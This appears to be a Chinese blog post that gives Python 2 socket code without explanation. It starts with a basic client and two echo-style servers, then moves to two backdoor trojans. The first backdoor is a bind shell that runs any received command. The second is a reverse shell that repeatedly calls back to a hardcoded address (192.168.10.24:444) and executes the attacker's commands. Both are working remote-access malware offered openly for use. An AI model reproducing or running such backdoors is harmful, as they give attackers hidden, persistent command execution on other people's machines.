懒得解释怎么写出来的,直接上代码

 

Client:  简单连接服务器

  1. #!/usr/bin/python
  2. #coding:utf-8
  3. import socket
  4. import sys
  5. socket.setdefaulttimeout(5)
  6. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  7. host = "www.baidu.com"
  8. port = 80
  9. remote_ip = socket.gethostbyname( host )
  10. message = "GET / HTTP/1.1\r\n\r\n"
  11. s.connect((remote_ip, port))
  12. s.sendall(message)
  13. reply = s.recv(4096)
  14. print reply

 

 

Server:  单线程,长久监听服务,长连接,会话先进先出排队原则

  1. #!/usr/bin/python
  2. #coding:utf-8
  3. import socket
  4. import sys
  5. HOST = \'\'
  6. PORT = 444
  7. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  8. s.bind((HOST, PORT))
  9. s.listen(10)
  10. while 1:
  11. conn, addr = s.accept()
  12. print "[+] connecting" , addr[0] + ":" , addr[1]
  13. conn.send("Welcome to the server. Type something like:"
  14. "COOKIE,GET,POST and hit <ENTRE>\n")
  15. while 1:
  16. data = conn.recv(1024)
  17. print data
  18. if data == "GET\n":
  19. data = "OK, wait a moment\n"
  20. if data == "POST\n":
  21. data = "I am not a http server\n"
  22. if data == "COOKIE\n":
  23. data = "a cookie Biscuits??\n"
  24. if data:
  25. conn.sendall(data)
  26. else:
  27. break
  28. conn.close()
  29. s.close()

 

 Server:  多线程,长久监听服务,长连接,同步处理会话

  1. #!/usr/bin/python
  2. #coding:utf-8
  3. import socket
  4. import sys
  5. from thread import *
  6. HOST = \'\'
  7. PORT = 555
  8. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. s.bind((HOST, PORT))
  10. s.listen(10)
  11. def clientthread(conn):
  12. conn.send("Welcome to the server. Type something like:"
  13. "COOKIE,GET,POST and hit <ENTRE>\n")
  14. while 1:
  15. data = conn.recv(1024)
  16. print data
  17. if data == "GET\n":
  18. data = "OK, wait a moment\n"
  19. if data == "POST\n":
  20. data = "I am not a http server\n"
  21. if data == "COOKIE\n":
  22. data = "a cookie Biscuits??\n"
  23. if data:
  24. conn.sendall(data)
  25. else:
  26. break
  27. conn.close()
  28. while 1:
  29. conn, addr = s.accept()
  30. print "[+] connecting" , addr[0] + ":" , addr[1]
  31. start_new_thread(clientthread, (conn,))
  32. s.close()

 

 BackDoor: 结合命令执行制作后门木马(正向)

  1. #!/usr/bin/python
  2. #coding:utf-8
  3. import socket
  4. import sys
  5. import commands
  6. from thread import *
  7. HOST = \'\'
  8. PORT = 854
  9. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  10. s.bind((HOST, PORT))
  11. s.listen(10)
  12. def clientthread(conn):
  13. conn.send("Welcome demon\'s backdoor!".center(50,"*") + "\n")
  14. while 1:
  15. conn.send("Demon_Backdoor# ")
  16. data = conn.recv(1024)
  17. if data:
  18. cmd = data.strip("\n")
  19. code,res = commands.getstatusoutput(cmd)
  20. if code == 0 :
  21. conn.sendall(res+"\n")
  22. else:
  23. print "[-]Error: code",code
  24. data = ""
  25. else:
  26. break
  27. conn.close()
  28. while 1:
  29. conn, addr = s.accept()
  30. print "[+] connecting" , addr[0] + ":" , addr[1]
  31. start_new_thread(clientthread, (conn,))
  32. s.close()

  

BackDoor: 反弹shell(反向)

  1. #!/usr/bin/python
  2. #coding:utf-8
  3. import socket
  4. import sys
  5. import commands
  6. from time import sleep
  7. from thread import *
  8. HOST = "192.168.10.24"
  9. PORT = 444
  10. def clientthread(s):
  11. global isConnect
  12. s.send("Welcome demon\'s backdoor!".center(50,"*") + "\n")
  13. while 1:
  14. s.send("Demon_Backdoor# ")
  15. data = s.recv(1024)
  16. if data :
  17. cmd = data.strip("\n")
  18. code,res = commands.getstatusoutput(cmd)
  19. if code == 0 :
  20. s.sendall(res+"\n")
  21. else:
  22. print "[-]Error: code",code
  23. data = ""
  24. else:
  25. break
  26. while 1:
  27. try:
  28. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  29. s.connect((HOST, PORT))
  30. print "[+] connecting" , HOST + ":", PORT
  31. clientthread(s)
  32. #start_new_thread(clientthread, (s,))
  33. s.close()
  34. except:
  35. sleep(0.5)

转载指明出处:http://www.cnblogs.com/demonxian3/p/8666416.html

版权声明:本文为demonxian3原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/demonxian3/p/8666416.html